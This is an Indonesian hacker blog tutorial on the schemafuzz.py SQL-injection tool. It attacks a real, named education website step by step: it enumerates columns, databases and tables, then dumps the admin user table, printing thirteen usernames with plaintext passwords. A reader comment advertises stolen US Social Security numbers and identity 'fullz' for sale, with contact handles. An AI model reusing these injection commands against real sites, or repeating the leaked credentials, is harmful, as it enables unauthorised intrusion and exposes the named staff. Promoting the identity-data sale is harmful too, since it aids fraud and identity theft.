AXXERX55 : Hacker Area: TUTORIAL SCHEMAFUZZ

...:::WELCOME TO MY BLOG, THANK'S FOR VISIT:::...

TUTORIAL SCHEMAFUZZ

Tool:

1.Python
2.Schemafuzz
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...
1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: http://www.ditplb.or.id/profile.php?id= ... CT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de
[-] Done!



Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dbs
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D namadatabase
Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb
Maka keluar:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


Berarti web itu punya 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek )

5.Melihat isi dari suatu tabel n kolom
Misal :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplb:Direktur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti:P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harry:progkal:ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done

Weleh.... kok userid n passwordnya gak di encrypt ya........... hehehe emang rejeki.....
hehehee

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
Misal:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --fuzz

Macam² perintah: ( menurutku )
--fuzz << mencari nama kolom n tabel pada sql v 4
--schema << melihat nama tabel
--dump << melihat isi kolom
--findcol << menemukan dakc0de ( colom )

1 komentar:

No Name mengatakan...

Hello Everyone !

USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

All SSN's are Tested & Verified.

**DETAILS IN LEADS/FULLZ**

->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS

*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers

->Hope for the long term business
->You can buy for your specific states too

**Contact 24/7**

Whatsapp > +923172721122

Email > leads.sellers1212@gmail.com

Telegram > @leadsupplier

ICQ > 752822040

Posting Komentar

 
Copyright © AXXERX55 : Hacker Area Blogger Theme by BloggerThemes & newwpthemes
. . . : : : WE LOVE INDONESIA Ini dadaku, mana dadamu Kalau Malaysia mau konfrontasi ekonomi Kita hadapi dengan konfrontasi ekonomi Kalau Malaysia mau konfrontasi politik Kita hadapi dengan konfrontasi politik Kalau Malaysia mau konfrontasi militer Kita hadapi dengan konfrontasi militer : : : . . .